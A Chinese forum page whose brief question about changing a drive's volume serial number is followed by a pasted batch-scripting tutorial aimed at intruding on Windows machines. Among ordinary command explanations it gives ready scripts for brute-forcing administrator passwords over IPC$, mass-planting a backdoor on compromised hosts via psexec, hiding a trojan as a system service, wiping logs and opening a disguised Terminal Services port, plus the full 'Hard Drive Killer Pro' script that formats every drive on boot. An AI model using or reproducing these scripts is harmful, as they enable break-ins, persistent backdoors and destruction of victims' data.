如何设置硬盘根目录的volume serial number?

unionsoft 2003-04-25 10:19:22
通过GetVolumeInformation()可以读取"C:\"的volume serial number,现在我想改变这个volume serial number,应该怎么办?
...全文
46 回复 打赏 收藏 转发到动态 举报
写回复
用AI写文章
回复
切换为时间正序
请发表友善的回复…
发表回复
简明批处理教程22009年10月20日 星期二 下午 05:35 最近对于批处理技术的探讨比较热,也有不少好的批处理程序发布,但是如果没有一定的相关知识恐怕不容易看懂和理解这些批处理文件,也就更谈不上自己动手编写了,古语云:“授人以鱼,不如授人以渔。”因为网上好像并没有一个比较完整的教材,所以抽一点时间写了这片《简明批处理教程》给新手朋友们.也献给所有为实现网络的自由与共享而努力的朋友们. 批处理文件是无格式的文本文件,它包含一条或多条命令。它的文件扩展名为 .bat 或 .cmd。在命令提示下键入批处理文件的名称,或者双击该批处理文件,系统就会调用Cmd.exe按照该文件中各个命令出现的顺序来逐个运行它们。使用批处理文件(也被称为批处理程序或脚本),可以简化日常或重复性任务。当然我们的这个版本的主要内容是介绍批处理在入侵中一些实际运用,例如我们后面要提到的用批处理文件来给系统打补丁、批量植入后门程序等。下面就开始我们批处理学习之旅吧。 一、简单批处理内部命令简介 1.Echo 命令 打开回显或关闭请求回显功能,或显示消息。如果没有任何参数,echo 命令将显示当前回显设置。 语法 echo [{on|off}] [message] Sample:@echo off / echo hello world 在实际应用中我们会把这条命令和重定向符号(也称为管道符号,一般用> >> ^)结合来实现输入一些命令到特定格式的文件中.这将在以后的例子中体现出来。 2.@ 命令 表示不显示@后面的命令,在入侵过程中(例如使用批处理来格式化敌人的硬盘)自然不能让对方看到你使用的命令啦。 Sample:@echo off @echo Now initializing the program,please wait a minite... @format X: /q/u/autoset (format 这个命令是不可以使用/y这个参数的,可喜的是微软留了个autoset这个参数给我们,效果和/y是一样的。) 3.Goto 命令 指定跳转到标签,找到标签后,程序将处理从下一行开始的命令。 语法:goto label(label是参数,指定所要转向的批处理程序中的行。) Sample: if {%1}=={} goto noparms if {%2}=={} goto noparms(如果这里的if、%1、%2你不明白的话,先跳过去,后面会有详细的解释。) @Rem check parameters if null show usage :noparms echo Usage: monitor.bat ServerIP PortNumber goto end 标签的名字可以随便起,但是最好是有意义的字母啦,字母前加个:用来表示这个字母是标签,goto命令就是根据这个:来寻找下一步跳到到那里。最好有一些说明这样你别人看起来才会理解你的意图啊。 4.Rem 命令 注释命令,在C语言中相当与/*--------*/,它并不会被执行,只是起一个注释的作用,便于别人阅读和你自己日后修改。 Rem Message Sample:@Rem Here is the description. 5.Pause 命令 运行 Pause 命令时,将显示下面的消息: Press any key to continue . . . Sample: @echo off :begin copy a:*.* d:back echo Please put a new disk into driver A pause goto begin 在这个例子中,驱动器 A 中磁盘上的所有文件均复制到d:back中。显示的注释提示您将另一张磁盘放入驱动器 A 时,pause 命令会使程序挂起,以便您更换磁盘,然后按任意键继续处理。 6.Call 命令 从一个批处理程序调用另一个批处理程序,并且不终止父批处理程序。call 命令接受用作调用目标的标签。如果在脚本或批处理文件外使用 Call,它将不会在命令行起作用。 语法 call [Drive:][Path] FileName [BatchParameters] [:label [arguments] 参数 [Drive:}[Path] FileName 指定要调用的批处理程序的位置和名称。filename 参数必须具有 .bat 或 .cmd 扩展名。 7.start 命令 调用外部程序,所有的DOS命令和命令行程序都可以由start命令来调用。 入侵常用参数: MIN 开始时窗口最小化 SEPARATE 在分开的空间内开始 16 位 Windows 程序 HIGH 在 HIGH 优先级类别开始应用程序 REALTIME 在 REALTIME 优先级类别开始应用程序 WAIT 启动应用程序并等候它结束 parameters 这些为传送到命令/程序的参数 执行的应用程序是 32-位 GUI 应用程序时,CMD.EXE 不等应用程序终止就返回命令提示。如果在命令脚本内执行,该新行为则不会发生。 8.choice 命令 choice 使用此命令可以让用户输入一个字符,从而运行不同的命令。使用时应该加/c:参数,c:后应写提示可输入的字符,之间无空格。它的返回码为1234…… 如: choice /c:dme defrag,mem,end 将显示 defrag,mem,end[D,M,E]? Sample: Sample.bat的内容如下: @echo off choice /c:dme defrag,mem,end if errorlevel 3 goto defrag(应先判断数值最高的错误码) if errorlevel 2 goto mem if errotlevel 1 goto end :defrag c:dosdefrag goto end :mem mem goto end :end echo good bye 此文件运行后,将显示 defrag,mem,end[D,M,E]? 用户可选择d m e ,然后if语句将作出判断,d表示执行标号为defrag的程序段,m表示执行标号为mem的程序段,e表示执行标号为end的程序段,每个程序段最后都以goto end将程序跳到end标号处,然后程序将显示good bye,文件结束。 9.If 命令 if 表示将判断是否符合规定的条件,从而决定执行不同的命令。有三种格式: 1、if "参数" == "字符串" 待执行的命令 参数如果等于指定的字符串,则条件成立,运行命令,否则运行下一句。(注意是两个等号) 如if "%1"=="a" format a: if {%1}=={} goto noparms if {%2}=={} goto noparms 2、if exist 文件名 待执行的命令 如果有指定的文件,则条件成立,运行命令,否则运行下一句。 如if exist config.sys edit config.sys 3、if errorlevel / if not errorlevel 数字 待执行的命令 如果返回码等于指定的数字,则条件成立,运行命令,否则运行下一句。 如if errorlevel 2 goto x2 DOS程序运行时都会返回一个数字给DOS,称为错误码errorlevel或称返回码,常见的返回码为0、1。 10.for 命令 for 命令是一个比较复杂的命令,主要用于参数在指定的范围内循环执行命令。 在批处理文件中使用 FOR 命令时,指定变量请使用 %%variable for {%variable|%%variable} in (set) do command [ CommandLineOptions] %variable 指定一个单一字母可替换的参数。 (set) 指定一个或一组文件。可以使用通配符。 command 指定对每个文件执行的命令。 command-parameters 为特定命令指定参数或命令行开关。 在批处理文件中使用 FOR 命令时,指定变量请使用 %%variable 而不要用 %variable。变量名称是区分大小写的,所以 %i 不同于 %I 如果命令扩展名被启用,下列额外的 FOR 命令格式会受到 支持: FOR /D %variable IN (set) DO command [command-parameters] 如果集中包含通配符,则指定与目录名匹配,而不与文件 名匹配。 FOR /R [drive:]path] %variable IN (set) DO command [command- 检查以 [drive:]path 为根的目录树,指向每个目录中的 FOR 语句。如果在 /R 后没有指定目录,则使用当前 目录。如果集仅为一个单点(.)字符,则枚举该目录树。 FOR /L %variable IN (start,step,end) DO command [command-para 该集表示以增量形式从开始到结束的一个数字序列。 因此,(1,1,5) 将产生序列 1 2 3 4 5,(5,-1,1) 将产生 序列 (5 4 3 2 1)。 FOR /F ["options"] %variable IN (file-set) DO command FOR /F ["options"] %variable IN ("string") DO command FOR /F ["options"] %variable IN ('command') DO command 或者,如果有 usebackq 选项: FOR /F ["options"] %variable IN (file-set) DO command FOR /F ["options"] %variable IN ("string") DO command FOR /F ["options"] %variable IN ('command') DO command filenameset 为一个或多个文件名。继续到 filenameset 中的 下一个文件之前,每份文件都已被打开、读取并经过处理。 处理包括读取文件,将其分成一行行的文字,然后将每行 解析成零或更多的符号。然后用已找到的符号字符串变量值 调用 For 循环。以默认方式,/F 通过每个文件的每一行中分开 的第一个空白符号。跳过空白行。您可通过指定可选 "options" 参数替代默认解析操作。这个带引号的字符串包括一个或多个 指定不同解析选项的关键字。这些关键字为: eol=c - 指一个行注释字符的结尾(就一个) skip=n - 指在文件开始时忽略的行数。 delims=xxx - 指分隔符集。这个替换了空格和跳格键的 默认分隔符集。 tokens=x,y,m-n - 指每行的哪一个符号被传递到每个迭代 的 for 本身。这会导致额外变量名称的 格式为一个范围。通过 nth 符号指定 m 符号字符串中的最后一个字符星号, 那么额外的变量将在最后一个符号解析之 分配并接受行的保留文本。 usebackq - 指定新语法已在下类情况中使用: 在作为命令执行一个后引号的字符串并且 引号字符为文字字符串命令并允许在 fi 中使用双引号扩起文件名称。 sample1: FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do command 会分析 myfile.txt 中的每一行,忽略以分号打头的那些行,将 每行中的第二个和第三个符号传递给 for 程序体;用逗号和/或 空格定界符号。请注意,这个 for 程序体的语句引用 %i 来 取得第二个符号,引用 %j 来取得第三个符号,引用 %k 来取得第三个符号后的所有剩余符号。对于带有空格的文件 名,您需要用双引号将文件名括起来。为了用这种方式来使 用双引号,您还需要使用 usebackq 选项,否则,双引号会 被理解成是用作定义某个要分析的字符串的。 %i 专门在 for 语句中得到说明,%j 和 %k 是通过 tokens= 选项专门得到说明的。您可以通过 tokens= 一行 指定最多 26 个符号,只要不试图说明一个高于字母 'z' 或 'Z' 的变量。请记住,FOR 变量是单一字母、分大小写和全局的; 同时不能有 52 个以上都在使用中。 您还可以在相邻字符串上使用 FOR /F 分析逻辑;方法是, 用单引号将括号之间的 filenameset 括起来。这样,该字符 串会被当作一个文件中的一个单一输入行。 最后,您可以用 FOR /F 命令来分析命令的输出。方法是,将 括号之间的 filenameset 变成一个反括字符串。该字符串会 被当作命令行,传递到一个子 CMD.EXE,其输出会被抓进 内存,并被当作文件分析。因此,以下例子: FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i 会枚举当前环境中的环境变量名称。 另外,FOR 变量参照的替换已被增强。您现在可以使用下列 选项语法: ~I - 删除任何引号("),扩充 %I %~fI - 将 %I 扩充到一个完全合格的路径名 %~dI - 仅将 %I 扩充到一个驱动器号 %~pI - 仅将 %I 扩充到一个路径 %~nI - 仅将 %I 扩充到一个文件名 %~xI - 仅将 %I 扩充到一个文件扩展名 %~sI - 扩充的路径只含有短名 %~aI - 将 %I 扩充到文件的文件属性 %~tI - 将 %I 扩充到文件的日期/时间 %~zI - 将 %I 扩充到文件的大小 %~$PATH:I - 查找列在路径环境变量的目录,并将 %I 扩充 到找到的第一个完全合格的名称。如果环境变量 未被定义,或者没有找到文件,此组合键会扩充 空字符串 可以组合修饰符来得到多重结果: %~dpI - 仅将 %I 扩充到一个驱动器号和路径 %~nxI - 仅将 %I 扩充到一个文件名和扩展名 %~fsI - 仅将 %I 扩充到一个带有短名的完整路径名 %~dp$PATH:i - 查找列在路径环境变量的目录,并将 %I 扩充 到找到的第一个驱动器号和路径。 %~ftzaI - 将 %I 扩充到类似输出线路的 DIR 在以上例子中,%I 和 PATH 可用其他有效数值代替。%~ 语法 用一个有效的 FOR 变量名终止。选取类似 %I 的大写变量名 比较易读,而且避免与不分大小写的组合键混淆。 以上是MS的官方帮助,下面我们举几个例子来具体说明一下For命令在入侵中的用途。 sample2: 利用For命令来实现对一台目标Win2k主机的暴力密码破解。 我们用net use \ipipc$ "password" /u:"administrator"来尝试这和目标主机进行连接,当成功时记下密码。 最主要的命令是一条:for /f i% in (dict.txt) do net use \ipipc$ "i%" /u:"administrator" 用i%来表示admin的密码,在dict.txt中这个取i%的值用net use 命令来连接。然后将程序运行结果传递给find命令-- for /f i%% in (dict.txt) do net use \ipipc$ "i%%" /u:"administrator"|find ":命令成功完成">>D:ok.txt ,这样就ko了。 sample3: 你有没有过手里有大量肉鸡等着你去种后门+木马呢?,当数量特别多的时候,原本很开心的一件事都会变得很郁闷:)。文章开头就谈到使用批处理文件,可以简化日常或重复性任务。那么如何实现呢?呵呵,看下去你就会明白了。 主要命令也只有一条:(在批处理文件中使用 FOR 命令时,指定变量使用 %%variable) @for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call door.bat %%i %%j %%k tokens的用法请参见上面的sample1,在这里它表示按顺序将victim.txt中的内容传递给door.bat中的参数%i %j %k。 而cultivate.bat无非就是用net use命令来建立IPC$连接,并copy木马+后门到victim,然后用返回码(If errorlever =)来筛选成功种植后门的主机,并echo出来,或者echo到指定的文件。 delims= 表示vivtim.txt中的内容是一空格来分隔的。我想看到这里你也一定明白这victim.txt里的内容是什么样的了。应该根据%%i %%j %%k表示的对象来排列,一般就是 ip password username。 代码雏形: --------------- cut here then save as a batchfile(I call it main.bat ) --------------------------- @echo off @if "%1"=="" goto usage @for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call IPChack.bat %%i %%j %%k @goto end :usage @echo run this batch in dos modle.or just double-click it. :end --------------- cut here then save as a batchfile(I call it main.bat ) --------------------------- ------------------- cut here then save as a batchfile(I call it door.bat) ----------------------------- @net use \%1ipc$ %3 /u:"%2" @if errorlevel 1 goto failed @echo Trying to establish the IPC$ connection …………OK @copy windrv32.exe\%1admin$system32 && if not errorlevel 1 echo IP %1 USER %2 PWD %3 >>ko.txt @psexec \%1 c:winntsystem32windrv32.exe @psexec \%1 net start windrv32 && if not errorlevel 1 echo %1 Backdoored >>ko.txt :failed @echo Sorry can not connected to the victim. ----------------- cut here then save as a batchfile(I call it door.bat) -------------------------------- 这只是一个自动种植后门批处理的雏形,两个批处理和后门程序(Windrv32.exe),PSexec.exe需放在统一目录下.批处理内容 尚可扩展,例如:加入清除日志+DDOS的功能,加入定时添加用户的功能,更深入一点可以使之具备自动传播功能(蠕虫).此处不多做叙述,有兴趣的朋友可自行研究. 二、如何在批处理文件中使用参数 批处理中可以使用参数,一般从1%到 9%这九个,当有多个参数时需要用shift来移动,这种情况并不多见,我们就不考虑它了。 sample1:fomat.bat @echo off if "%1"=="a" format a: :format @format a:/q/u/auotset @echo please insert another disk to driver A. @pause @goto fomat 这个例子用于连续地格式化几张软盘,所以用的时候需在dos窗口输入fomat.bat a,呵呵,好像有点画蛇添足了~^_^ sample2: 当我们要建立一个IPC$连接地时候总要输入一大串命令,弄不好就打错了,所以我们不如把一些固定命令写入一个批处理,把肉鸡地ip password username 当着参数来赋给这个批处理,这样就不用每次都打命令了。 @echo off @net use \1%ipc$ "2%" /u:"3%" 注意哦,这里PASSWORD是第二个参数。 @if errorlevel 1 echo connection failed 怎么样,使用参数还是比较简单的吧?你这么帅一定学会了^_^. 三、如何使用组合命令(Compound Command) 1.& Usage:第一条命令 & 第二条命令 [& 第三条命令...] 用这种方法可以同时执行多条命令,而不管命令是否执行成功 Sample: C:>dir z: & dir c:Ex4rch The system cannot find the path specified. Volume in drive C has no label. Volume Serial Number is 0078-59FB Directory of c:Ex4rch 2002-05-14 23:51 2002-05-14 23:51 2002-05-14 23:51 14 sometips.gif 2.&& Usage:第一条命令 && 第二条命令 [&& 第三条命令...] 用这种方法可以同时执行多条命令,当碰到执行出错的命令后将不执行后面的命令,如果一直没有出错则一直执行完所有命令; Sample: C:>dir z: && dir c:Ex4rch The system cannot find the path specified. C:>dir c:Ex4rch && dir z: Volume in drive C has no label. Volume Serial Number is 0078-59FB Directory of c:Ex4rch 2002-05-14 23:55 2002-05-14 23:55 2002-05-14 23:55 14 sometips.gif 1 File(s) 14 bytes 2 Dir(s) 768,671,744 bytes free The system cannot find the path specified. 在做备份的时候可能会用到这种命令会比较简单,如: dir file://192.168.0.1/database/backup.mdb && copy file://192.168.0.1/database/backup.mdb E:backup 如果远程服务器上存在backup.mdb文件,就执行copy命令,若不存在该文件则不执行copy命令。这种用法可以替换IF exist了 :) 3.|| Usage:第一条命令 || 第二条命令 [|| 第三条命令...] 用这种方法可以同时执行多条命令,当碰到执行正确的命令后将不执行后面的命令,如果没有出现正确的命令则一直执行完所有命令; Sample: C:Ex4rch>dir sometips.gif || del sometips.gif Volume in drive C has no label. Volume Serial Number is 0078-59FB Directory of C:Ex4rch 2002-05-14 23:55 14 sometips.gif 1 File(s) 14 bytes 0 Dir(s) 768,696,320 bytes free 组合命令使用的例子: sample: @copy trojan.exe \%1admin$system32 && if not errorlevel 1 echo IP %1 USER %2 PASS %3 >>victim.txt 四、管道命令的使用 1.| 命令 Usage:第一条命令 | 第二条命令 [| 第三条命令...] 将第一条命令的结果作为第二条命令的参数来使用,记得在unix中这种方式很常见。 sample: time /t>>D:IP.log netstat -n -p tcp|find ":3389">>D:IP.log start Explorer 看出来了么?用于终端服务允许我们为用户自定义起始的程序,来实现让用户运行下面这个bat,以获得登录用户的IP。 2.>、>>输出重定向命令 将一条命令或某个程序输出结果的重定向到特定文件中, > 与 >>的区别在于,>会清除调原有文件中的内容后写入指定文件,而>>只会追加内容到指定文件中,而不会改动其中的内容。 sample1: echo hello world>c:hello.txt (stupid example?) sample2: 时下DLL木马盛行,我们知道system32是个捉迷藏的好地方,许多木马都削尖了脑袋往那里钻,DLL马也不例外,针对这一点我们可以在安装好系统和必要的应用程序后,对该目录下的EXE和DLL文件作一个记录: 运行CMD--转换目录到system32--dir *.exe>exeback.txt & dir *.dll>dllback.txt, 这样所有的EXE和DLL文件的名称都被分别记录到exeback.txt和dllback.txt中, 日后如发现异常但用传统的方法查不出问题时,则要考虑是不是系统中已经潜入DLL木马了. 这时我们用同样的命令将system32下的EXE和DLL文件记录到另外的exeback1.txt和dllback1.txt中,然后运行: CMD--fc exeback.txt exeback1.txt>diff.txt & fc dllback.txt dllback1.txt>diff.txt.(用FC命令比较前后两次的DLL和EXE文件,并将结果输入到diff.txt中),这样我们就能发现一些多出来的DLL和EXE文件,然后通过查看创建时间、版本、是否经过压缩等就能够比较容易地判断出是不是已经被DLL木马光顾了。没有是最好,如果有的话也不要直接DEL掉,先用regsvr32 /u trojan.dll将后门DLL文件注销掉,再把它移到回收站里,若系统没有异常反映再将之彻底删除或者提交给杀毒软件公司。 3.& 、<& & 将一个句柄的输出写入到另一个句柄的输入中。 >Sample.reg @echo [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]>Sample.reg @echo "Invader"="Ex4rch">>Sample.reg @echo "door"=5>>C:\WINNT\system32\door.exe>>Sample.reg @echo "Autodos"=dword:02>>Sample.reg samlpe2: 我们现在在使用一些比较老的木马时,可能会在注册表的[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun(Runonce、Runservices、Runexec)]下生成一个键值用来实现木马的自启动.但是这样很容易暴露木马程序的路径,从而导致木马被查杀,相对地若是将木马程序注册为系统服务则相对安全一些.下面以配置好地IRC木马DSNX为例(名为windrv32.exe) @start windrv32.exe @attrib +h +r windrv32.exe @echo [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] >>patch.dll @echo "windsnx "=- >>patch.dll @sc.exe create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath= c:winntsystem32windrv32.exe @regedit /s patch.dll @delete patch.dll @REM [删除DSNXDE在注册表中的启动项,用sc.exe将之注册为系统关键性服务的同时将其属性设为隐藏和只读,并config为自启动] @REM 这样不是更安全^_^. 六、精彩实例放送 1.删除win2k/xp系统默认共享的批处理 ------------------------ cut here then save as .bat or .cmd file --------------------------- @echo preparing to delete all the default shares.when ready pres any key. @pause @echo off :Rem check parameters if null show usage. if {%1}=={} goto :Usage :Rem code start. echo. echo ------------------------------------------------------ echo. echo Now deleting all the default shares. echo. net share %1$ /delete net share %2$ /delete net share %3$ /delete net share %4$ /delete net share %5$ /delete net share %6$ /delete net share %7$ /delete net share %8$ /delete net share %9$ /delete net stop Server net start Server echo. echo All the shares have been deleteed echo. echo ------------------------------------------------------ echo. echo Now modify the registry to change the system default properties. echo. echo Now creating the registry file echo Windows Registry Editor Version 5.00> c:delshare.reg echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceslanmanserverparameters]>> c:delshare.reg echo "AutoShareWks"=dword:00000000>> c:delshare.reg echo "AutoShareServer"=dword:00000000>> c:delshare.reg echo Nowing using the registry file to chang the system default properties. regedit /s c:delshare.reg echo Deleting the temprotarily files. del c:delshare.reg goto :END :Usage echo. echo ------------------------------------------------------ echo. echo ☆ A example for batch file ☆ echo ☆ [Use batch file to change the sysytem share properties.] ☆ echo. echo Author:Ex4rch echo Mail:Ex4rch@hotmail.com QQ:1672602 echo. echo Error:Not enough parameters echo. echo ☆ Please enter the share disk you wanna delete ☆ echo. echo For instance,to delete the default shares: echo delshare c d e ipc admin print echo. echo If the disklable is not as C: D: E: ,Please chang it youself. echo. echo example: echo If locak disklable are C: D: E: X: Y: Z: ,you should chang the command into : echo delshare c d e x y z ipc admin print echo. echo *** you can delete nine shares once in a useing *** echo. echo ------------------------------------------------------ goto :EOF :END echo. echo ------------------------------------------------------ echo. echo OK,delshare.bat has deleted all the share you assigned. echo.Any questions ,feel free to mail to Ex4rch@hotmail.com. echo echo. echo ------------------------------------------------------ echo. :EOF echo end of the batch file ------------------------ cut here then save as .bat or .cmd file --------------------------- .全面加固系统(给肉鸡打补丁)的批处理文件 ------------------------ cut here then save as .bat or .cmd file --------------------------- @echo Windows Registry Editor Version 5.00 >patch.dll @echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceslanmanserverparameters] >>patch.dll @echo "AutoShareServer"=dword:00000000 >>patch.dll @echo "AutoShareWks"=dword:00000000 >>patch.dll @REM [禁止共享] @echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa] >>patch.dll @echo "restrictanonymous"=dword:00000001 >>patch.dll @REM [禁止匿名登录] @echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesNetBTParameters] >>patch.dll @echo "SMBDeviceEnabled"=dword:00000000 >>patch.dll @REM [禁止及文件访问和打印共享] @echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices@REMoteRegistry] >>patch.dll @echo "Start"=dword:00000004 >>patch.dll @echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSchedule] >>patch.dll @echo "Start"=dword:00000004 >>patch.dll @echo [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon] >>patch.dll @echo "ShutdownWithoutLogon"="0" >>patch.dll @REM [禁止登录前关机] @echo "DontDisplayLastUserName"="1" >>patch.dll @REM [禁止显示前一个登录用户名称] @regedit /s patch.dll ------------------------ cut here then save as .bat or .cmd file --------------------------- 下面命令是清除肉鸡所有日志,禁止一些危险的服务,并修改肉鸡的terminnal service留跳后路。 @regedit /s patch.dll @net stop w3svc @net stop event log @del c:winntsystem32logfilesw3svc1*.* /f /q @del c:winntsystem32logfilesw3svc2*.* /f /q @del c:winntsystem32config*.event /f /q @del c:winntsystem32dtclog*.* /f /q @del c:winnt*.txt /f /q @del c:winnt*.log /f /q @net start w3svc @net start event log @rem [删除日志] @net stop lanmanserver /y @net stop Schedule /y @net stop RemoteRegistry /y @del patch.dll @echo The server has been patched,Have fun. @del patch.bat @REM [禁止一些危险的服务。] @echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp] >>patch.dll @echo "PortNumber"=dword:00002010 >>patch.dll @echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWdsrdpwdTdstcp >>patch.dll @echo "PortNumber"=dword:00002012 >>patch.dll @echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTermDD] >>patch.dll @echo "Start"=dword:00000002 >>patch.dll @echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSecuService] >>patch.dll @echo "Start"=dword:00000002 >>patch.dll @echo "ErrorControl"=dword:00000001 >>patch.dll @echo "ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00, >>patch.dll @echo 74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65, >>patch.dll @echo 00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00 >>patch.dll @echo "ObjectName"="LocalSystem" >>patch.dll @echo "Type"=dword:00000010 >>patch.dll @echo "Description"="Keep record of the program and windows' message。" >>patch.dll @echo "DisplayName"="Microsoft EventLog" >>patch.dll @echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicestermservice] >>patch.dll @echo "Start"=dword:00000004 >>patch.dll @copy c:winntsystem32termsrv.exe c:winntsystem32eventlog.exe @REM [修改3389连接,端口为8210(十六进制为00002012),名称为Microsoft EventLog,留条后路] 3.Hard Drive Killer Pro Version 4.0(玩批处理到这个水平真的不容易了。) ------------------------ cut here then save as .bat or .cmd file --------------------------- @echo off rem This program is dedecated to a very special person that does not want to be named. :start cls echo PLEASE WAIT WHILE PROGRAM LOADS . . . call attrib -r -h c:autoexec.bat >nul echo @echo off >c:autoexec.bat echo call format c: /q /u /autoSample >nul >>c:autoexec.bat call attrib +r +h c:autoexec.bat >nul rem Drive checking and assigning the valid drives to the drive variable. set drive= set alldrive=c d e f g h i j k l m n o p q r s t u v w x y z rem code insertion for Drive Checking takes place here. rem drivechk.bat is the file name under the root directory. rem As far as the drive detection and drive variable settings, don't worry about how it rem works, it's d*amn to complicated for the average or even the expert batch programmer. rem Except for Tom Lavedas. echo @echo off >drivechk.bat echo @prompt %%%%comspec%%%% /f /c vol %%%%1: $b find "Vol" > nul >{t}.bat %comspec% /e:2048 /c {t}.bat >>drivechk.bat del {t}.bat echo if errorlevel 1 goto enddc >>drivechk.bat cls echo PLEASE WAIT WHILE PROGRAM LOADS . . . rem When errorlevel is 1, then the above is not true, if 0, then it's true. rem Opposite of binary rules. If 0, it will elaps to the next command. echo @prompt %%%%comspec%%%% /f /c dir %%%%1:./ad/w/-p $b find "bytes" > nul >{t}.bat %comspec% /e:2048 /c {t}.bat >>drivechk.bat del {t}.bat echo if errorlevel 1 goto enddc >>drivechk.bat cls echo PLEASE WAIT WHILE PROGRAM LOADS . . . rem if errorlevel is 1, then the drive specified is a removable media drive - not ready. rem if errorlevel is 0, then it will elaps to the next command. echo @prompt dir %%%%1:./ad/w/-p $b find " 0 bytes free" > nul >{t}.bat %comspec% /e:2048 /c {t}.bat >>drivechk.bat del {t}.bat echo if errorlevel 1 set drive=%%drive%% %%1 >>drivechk.bat cls echo PLEASE WAIT WHILE PROGRAM LOADS . . . rem if it's errorlevel 1, then the specified drive is a hard or floppy drive. rem if it's not errorlevel 1, then the specified drive is a CD-ROM drive. echo :enddc >>drivechk.bat rem Drive checking insertion ends here. "enddc" stands for "end dDRIVE cHECKING". rem Now we will use the program drivechk.bat to attain valid drive information. :Sampledrv for %%a in (%alldrive%) do call drivechk.bat %%a >nul del drivechk.bat >nul if %drive.==. set drive=c :form_del call attrib -r -h c:autoexec.bat >nul echo @echo off >c:autoexec.bat echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:autoexec.bat echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autoSample >nul >>c:autoexec.bat echo cls >>c:autoexec.bat echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:autoexec.bat echo for %%%%a in (%drive%) do call c:temp.bat %%%%a Bunga >nul >>c:autoexec.bat echo cls >>c:autoexec.bat echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:autoexec.bat echo for %%%%a in (%drive%) call deltree /y %%%%a: >nul >>c:autoexec.bat echo cls >>c:autoexec.bat echo echo Loading Windows, please wait while Microsoft Windows recovers >>c:autoexec.bat echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autoSample >nul >>c:autoexec.bat echo cls >>c:autoexec.bat echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:autoexec.bat echo for %%%%a in (%drive%) do call c:temp.bat %%%%a Bunga >nul >>c:autoexec.bat echo cls >>c:autoexec.bat echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:autoexec.bat echo for %%%%a in (%drive%) call deltree /y %%%%a: >nul >>c:autoexec.bat echo cd >>c:autoexec.bat echo cls >>c:autoexec.bat echo echo Welcome to the land of death. Munga Bunga's Multiple Hard Drive Killer version 4.0. >>c:autoexec.bat echo echo If you ran this file, then sorry, I just made it. The purpose of this program is to tell you the following. . . >>c:autoexec.bat echo echo 1. To make people aware that security should not be taken for granted. >>c:autoexec.bat echo echo 2. Love is important, if you have it, truly, don't let go of it like I did! >>c:autoexec.bat echo echo 3. If you are NOT a vegetarian, then you are a murderer, and I'm glad your HD is dead. >>c:autoexec.bat echo echo 4. Don't support the following: War, Racism, Drugs and the Liberal Party.>>c:autoexec.bat echo echo. >>c:autoexec.bat echo echo Regards, >>c:autoexec.bat echo echo. >>c:autoexec.bat echo echo Munga Bunga >>c:autoexec.bat call attrib +r +h c:autoexec.bat :makedir if exist c:temp.bat attrib -r -h c:temp.bat >nul echo @echo off >c:temp.bat echo %%1: >>c:temp.bat echo cd >>c:temp.bat echo :startmd >>c:temp.bat echo for %%%%a in ("if not exist %%2nul md %%2" "if exist %%2nul cd %%2") do %%%%a >>c:temp.bat echo for %%%%a in (">ass_hole.txt") do echo %%%%a Your Gone @$$hole!!!! >>c:temp.bat echo if not exist %%1:%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2nul goto startmd >>c:temp.bat call attrib +r +h c:temp.bat >nul cls echo Initializing Variables . . . rem deltree /y %%a:*. only eliminates directories, hence leaving the file created above for further destruction. for %%a in (%drive%) do call format %%a: /q /u /autoSample >nul cls echo Initializing Variables . . . echo Validating Data . . . for %%a in (%drive%) do call c:temp.bat %%a Munga >nul cls echo Initializing Variables . . . echo Validating Data . . . echo Analyzing System Structure . . . for %%a in (%drive%) call attrib -r -h %%a: /S >nul call attrib +r +h c:temp.bat >nul call attrib +r +h c:autoexec.bat >nul cls echo Initializing Variables . . . echo Validating Data . . . echo Analyzing System Structure . . . echo Initializing Application . . . for %%a in (%drive%) call deltree /y %%a:*. >nul cls echo Initializing Variables . . . echo Validating Data . . . echo Analyzing System Structure . . . echo Initializing Application . . . echo Starting Application . . . for %%a in (%drive%) do call c:temp.bat %%a Munga >nul cls echo Thank you for using a Munga Bunga product. echo. echo Oh and, Bill Gates rules, and he is not a geek, he is a good looking genius. echo. echo Here is a joke for you . . . echo. echo Q). What's the worst thing about being an egg? echo A). You only get laid once. echo. echo HAHAHAHA, get it? Don't you just love that one? echo. echo Regards, echo. echo Munga Bunga :end rem Hard Drive Killer Pro Version 4.0, enjoy!!!! rem Author: Munga Bunga - from Australia, the land full of retarded Australian's (help me get out of here) 全文完毕, 简明批处理教程(上)2009-05-30 15:53 前言 